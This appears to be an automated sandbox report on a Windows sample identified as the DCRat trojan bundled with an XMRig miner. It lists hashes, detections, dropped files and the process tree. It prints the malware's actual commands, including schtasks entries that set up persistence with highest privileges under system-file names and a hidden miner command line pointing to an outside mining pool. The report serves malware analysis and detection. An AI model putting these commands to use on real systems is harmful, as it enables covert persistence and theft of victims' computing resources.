dcrat | c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e

Analysis

max time kernel
135s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
22-07-2021 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software v3.0.5.exe
Size

910KB
MD5

56d73f0b8c89094a9f0ad6277f042b3d
SHA1

6efe8b8257f030fdb63a069aad558b6282310a31
SHA256

c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512

6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379

Score

10^/10

dcrat xmrig infostealer miner rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat Payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe	dcrat
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe	dcrat

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/964-223-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 11 IoCs

Processes:

Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeservices64.exeservices32.exesihost64.exesihost32.exe

pid	process
3064	Dcr.exe
3588	etc.exe
2844	xmr.exe
2208	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
3960	fonthostSvcIntodhcp.exe
2412	ShellExperienceHost.exe
2888	services64.exe
3960	services32.exe
1524	sihost64.exe
2836	sihost32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ipinfo.io
16 ipinfo.io

flow	ioc
15	ipinfo.io
16	ipinfo.io

Drops file in System32 directory 18 IoCs

Processes:

fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\System32\msdxm\dllhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\MapsCSP\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wscproxystub\slui.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\msdxm\5940a34987c99120d96dace90a3f93f329dcad63	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\tpm\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\MapsCSP\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\dbgcore\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File opened for modification	C:\Windows\System32\dbgcore\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\puiapi\spoolsv.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\puiapi\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wscproxystub\a29f4157103644af5692ebfddf35f6dff4e237da	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\blb_ps\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\tpm\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\mstsc\24dbde2999530ef5fd907494bc374d663924116c	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\blb_ps\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\dbgcore\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe	fonthostSvcIntodhcp.exe
File opened for modification	C:\Windows\System32\blb_ps\fontdrvhost.exe	fonthostSvcIntodhcp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2888 set thread context of 964 2888 services64.exe explorer.exe

description	pid	process	target process
PID 2888 set thread context of 964	2888	services64.exe	explorer.exe

Drops file in Program Files directory 2 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe	fonthostSvcIntodhcp.exe

Drops file in Windows directory 9 IoCs

Processes:

fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\bfsvc\explorer.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\bfsvc\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\dab4d89cac03ec27dbe47b361df763dc3f848f6c	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\f8c8f1285d826bc63910aaf97db97186ba642b4f	fonthostSvcIntodhcp.exe
File created	C:\Windows\setupact\explorer.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\setupact\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\AppxMetadata\winlogon.exe	fonthostSvcIntodhcp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 23 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3304	schtasks.exe
2412	schtasks.exe
4012	schtasks.exe
3204	schtasks.exe
4044	schtasks.exe
1540	schtasks.exe
3984	schtasks.exe
2428	schtasks.exe
3204	schtasks.exe
2288	schtasks.exe
740	schtasks.exe
2204	schtasks.exe
64	schtasks.exe
60	schtasks.exe
2084	schtasks.exe
8	schtasks.exe
2888	schtasks.exe
2660	schtasks.exe
1968	schtasks.exe
768	schtasks.exe
2740	schtasks.exe
1052	schtasks.exe
2740	schtasks.exe

Modifies registry class 1 IoCs

Processes:

Dcr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Dcr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	Dcr.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeetc.exexmr.exeservices32.exeservices64.exe

pid	process
2208	fonthostSvcIntodhcp.exe
2208	fonthostSvcIntodhcp.exe
2208	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
4044	fonthostSvcIntodhcp.exe
3960	fonthostSvcIntodhcp.exe
3960	fonthostSvcIntodhcp.exe
3960	fonthostSvcIntodhcp.exe
2412	ShellExperienceHost.exe
2412	ShellExperienceHost.exe
3588	etc.exe
2844	xmr.exe
3960	services32.exe
2888	services64.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ShellExperienceHost.exe

pid process

2412 ShellExperienceHost.exe

pid	process
2412	ShellExperienceHost.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeetc.exexmr.exeservices32.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2208	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	4044	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	3960	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	2412	ShellExperienceHost.exe
Token: SeDebugPrivilege	3588	etc.exe
Token: SeDebugPrivilege	2844	xmr.exe
Token: SeDebugPrivilege	3960	services32.exe
Token: SeDebugPrivilege	2888	services64.exe
Token: SeLockMemoryPrivilege	964	explorer.exe
Token: SeLockMemoryPrivilege	964	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeetc.exexmr.execmd.exe

description	pid	process	target process
PID 740 wrote to memory of 3064	740	Software v3.0.5.exe	Dcr.exe
PID 740 wrote to memory of 3064	740	Software v3.0.5.exe	Dcr.exe
PID 740 wrote to memory of 3064	740	Software v3.0.5.exe	Dcr.exe
PID 740 wrote to memory of 3588	740	Software v3.0.5.exe	etc.exe
PID 740 wrote to memory of 3588	740	Software v3.0.5.exe	etc.exe
PID 740 wrote to memory of 2844	740	Software v3.0.5.exe	xmr.exe
PID 740 wrote to memory of 2844	740	Software v3.0.5.exe	xmr.exe
PID 3064 wrote to memory of 3964	3064	Dcr.exe	WScript.exe
PID 3064 wrote to memory of 3964	3064	Dcr.exe	WScript.exe
PID 3064 wrote to memory of 3964	3064	Dcr.exe	WScript.exe
PID 3964 wrote to memory of 1524	3964	WScript.exe	cmd.exe
PID 3964 wrote to memory of 1524	3964	WScript.exe	cmd.exe
PID 3964 wrote to memory of 1524	3964	WScript.exe	cmd.exe
PID 1524 wrote to memory of 2208	1524	cmd.exe	fonthostSvcIntodhcp.exe
PID 1524 wrote to memory of 2208	1524	cmd.exe	fonthostSvcIntodhcp.exe
PID 2208 wrote to memory of 768	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 768	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 3984	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 3984	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 60	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 60	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 2740	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 2740	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 2084	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 2084	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 8	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 8	2208	fonthostSvcIntodhcp.exe	schtasks.exe
PID 2208 wrote to memory of 4044	2208	fonthostSvcIntodhcp.exe	fonthostSvcIntodhcp.exe
PID 2208 wrote to memory of 4044	2208	fonthostSvcIntodhcp.exe	fonthostSvcIntodhcp.exe
PID 4044 wrote to memory of 3304	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 3304	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2428	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2428	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2412	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2412	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2888	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2888	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 3204	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 3204	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2288	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 2288	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 1052	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 1052	4044	fonthostSvcIntodhcp.exe	schtasks.exe
PID 4044 wrote to memory of 3960	4044	fonthostSvcIntodhcp.exe	fonthostSvcIntodhcp.exe
PID 4044 wrote to memory of 3960	4044	fonthostSvcIntodhcp.exe	fonthostSvcIntodhcp.exe
PID 3960 wrote to memory of 4012	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 4012	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2660	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2660	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 740	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 740	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2740	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2740	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2204	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2204	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 1968	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 1968	3960	fonthostSvcIntodhcp.exe	schtasks.exe
PID 3960 wrote to memory of 2412	3960	fonthostSvcIntodhcp.exe	ShellExperienceHost.exe
PID 3960 wrote to memory of 2412	3960	fonthostSvcIntodhcp.exe	ShellExperienceHost.exe
PID 3588 wrote to memory of 2392	3588	etc.exe	cmd.exe
PID 3588 wrote to memory of 2392	3588	etc.exe	cmd.exe
PID 2844 wrote to memory of 2420	2844	xmr.exe	cmd.exe
PID 2844 wrote to memory of 2420	2844	xmr.exe	cmd.exe
PID 2420 wrote to memory of 3204	2420	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Users\Admin\AppData\Roaming\Dcr.exe
C:\Users\Admin\AppData\Roaming\Dcr.exe
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\blb_ps\fontdrvhost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:768

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:3984

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\Windows\System32\wscproxystub\slui.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:60

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\bfsvc\explorer.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:2740

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:2084

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\slui.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:8

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Boot\cs-CZ\services.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3304

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\setupact\explorer.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2428

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2412

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\msdxm\dllhost.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2888

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\tpm\fontdrvhost.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3204

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\MapsCSP\fontdrvhost.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2288

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:1052

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\dbgcore\fontdrvhost.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:4012

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:2660

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fonthostSvcIntodhcp" /sc ONLOGON /tr "'C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D\fonthostSvcIntodhcp.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:740

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\puiapi\spoolsv.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:2740

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:2204

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\PerfLogs\RuntimeBroker.exe'" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:1968

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Users\Admin\AppData\Roaming\etc.exe
C:\Users\Admin\AppData\Roaming\etc.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
3⤵
PID:2392

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:1540

C:\Users\Admin\AppData\Roaming\services32.exe
"C:\Users\Admin\AppData\Roaming\services32.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
4⤵
PID:3204

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:4044

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2836

C:\Users\Admin\AppData\Roaming\xmr.exe
C:\Users\Admin\AppData\Roaming\xmr.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:3204

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:2288

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:64

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1524

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fonthostSvcIntodhcp.exe.log
MD5
c3768cc379bdfb7850f881c26e417929

SHA1
b356b73dd3c102bbfa2e30280478a70ab7ebaf95

SHA256
6249d345cf089d21710e680a923fca94324d1523c8dd8e6d4947e3fa064c353a

SHA512
e115130acc07da8838de670e2bbe491e4a4a26ff968f67a46fd5ada86e453234f5a4a4a0c1574cb194dc0274fd266cf5507036208a0dc5358e7454d01b88fdd4

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

